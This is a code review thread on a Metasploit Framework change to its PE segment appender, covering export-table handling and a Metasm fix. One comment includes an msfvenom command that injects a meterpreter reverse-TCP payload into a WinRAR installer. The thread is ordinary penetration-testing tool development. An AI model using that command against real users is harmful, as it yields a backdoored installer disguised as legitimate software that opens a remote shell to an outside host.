lib/msf/core/exe/segment_appender.rb

```diff
@@ -16,6 +16,12 @@ def payload_stub(prefix)
     def generate_pe
       # Copy our Template into a new PE
       pe_orig = Metasm::PE.decode_file(template)
+      if is_warbird?(pe_orig)
+        raise RuntimeError, "The template to inject to appears to have license verification (warbird)"
+      end
+      if pe_orig.export && pe_orig.export.num_exports == 0
```

Comment:
I'm not sure we should abort if there is no export in the template binary. In my understanding, it is not a requirement to generate PE's from templates. I believe this is a Metasm issue in this particular case.

This template binary (`winrar-x64-600.exe`) does have an export directory but with no exported functions:

![Screen Shot 2021-02-02 at 19 32 07](https://user-images.githubusercontent.com/56716719/106646109-920c3600-658d-11eb-87dc-ba98088735ea.png)

When decoding the export directory, Metasm only initializes the `@exports` instance variable if the AddressOfFunctions (`@func_p`) is not nil ([here](https://github.com/jjyg/metasm/blob/master/metasm/exe_format/coff_decode.rb#L83)). Since it is nil for this particular binary, `@exports` is not initialized and, therefore, is also `nil`.

I fixed the issue by moving the `@exports` initialization outside of the `if` block:
```ruby
			@exports = []
			if coff.sect_at_rva(@func_p)\
				addrs = []
				@num_exports.times { addrs << coff.decode_word }
                                 ...
```

```
❯ ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.133 LPORT=8090 -f exe -x winrar-x64-600.exe -k -o winrar_new.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 625664 bytes
Saved as: winrar_new.exe
```

That said, I'm not sure if this fix is enough. This might need more investigation to make sure it doesn't break anything.

Reply:
This was my first thoughts too; I wondered if there were any semantic differences between exports being `nil` versus an empty array? i.e. Are there existing code assumptions around `nil` being a possible value that this code in isolation doesn't take into consideration?

Reply:
Well I suppose this really depends on if the code is calling `.empty?` on `@exports`. If it is, then `nil` won't work here. Also `nil` is not considered equal to `[]` in Ruby so I'd be concerned about its treatment even if `.empty?` wasn't being used.

Reply:
Spencer has since fixed this issue with https://github.com/rapid7/metasm/pull/1 which is awaiting updates here and then it will be landed. Closing this as resolved as we have a separate PR to fix this issue and I'll be removing these changes from the file soon.

Reply:
Marking as fixed due to above reason and this edit being removed with https://github.com/rapid7/metasploit-framework/pull/14683/commits/bffbf4601735595cddddad35b2d848455ad68854.